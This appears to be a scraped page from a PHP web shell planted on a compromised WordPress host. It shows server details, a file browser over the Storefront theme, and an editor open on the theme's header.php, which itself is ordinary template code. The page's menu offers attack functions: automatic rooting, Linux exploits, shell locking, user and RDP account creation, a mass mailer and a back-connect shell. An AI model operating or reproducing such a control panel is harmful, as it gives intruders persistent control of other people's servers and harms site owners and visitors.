Linux webm014.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.130.20.14 | : 216.73.217.167
Cant Read [ /etc/named.conf ]
7.4.33
hsesolc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hsesolc /
www /
wp-content /
themes /
storefront /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
404.php
2.06
KB
-rw-r--r--
README.txt
53.73
KB
-rw-r--r--
archive.php
756
B
-rw-r--r--
comments.php
3.04
KB
-rw-r--r--
content-homepage.php
659
B
-rw-r--r--
content-none.php
1.2
KB
-rw-r--r--
content-page.php
406
B
-rw-r--r--
content-single.php
679
B
-rw-r--r--
content.php
445
B
-rw-r--r--
footer.php
737
B
-rw-r--r--
functions.php
2.16
KB
-rw-r--r--
header.php
1.9
KB
-rw-r--r--
index.php
788
B
-rw-r--r--
loop.php
737
B
-rw-r--r--
page.php
860
B
-rw-r--r--
screenshot.png
59.31
KB
-rw-r--r--
search.php
731
B
-rw-r--r--
sidebar.php
278
B
-rw-r--r--
single.php
538
B
-rw-r--r--
style-rtl.css
39.52
KB
-rw-r--r--
style.css
39.54
KB
-rw-r--r--
style.scss
2.66
KB
-rw-r--r--
template-fullwidth.php
657
B
-rw-r--r--
template-homepage.php
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme. * * Displays all of the <head> section and everything up till <div id="content"> * * @package storefront */ ?><!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <?php do_action( 'storefront_before_site' ); ?> <div id="page" class="hfeed site"> <?php do_action( 'storefront_before_header' ); ?> <header id="masthead" class="site-header" role="banner" style="<?php storefront_header_styles(); ?>"> <?php /** * Functions hooked into storefront_header action * * @hooked storefront_header_container - 0 * @hooked storefront_skip_links - 5 * @hooked storefront_social_icons - 10 * @hooked storefront_site_branding - 20 * @hooked storefront_secondary_navigation - 30 * @hooked storefront_product_search - 40 * @hooked storefront_header_container_close - 41 * @hooked storefront_primary_navigation_wrapper - 42 * @hooked storefront_primary_navigation - 50 * @hooked storefront_header_cart - 60 * @hooked storefront_primary_navigation_wrapper_close - 68 */ do_action( 'storefront_header' ); ?> </header><!-- #masthead --> <?php /** * Functions hooked in to storefront_before_content * * @hooked storefront_header_widget_region - 10 * @hooked woocommerce_breadcrumb - 10 */ do_action( 'storefront_before_content' ); ?> <div id="content" class="site-content" tabindex="-1"> <div class="col-full"> <?php do_action( 'storefront_content_top' );
Close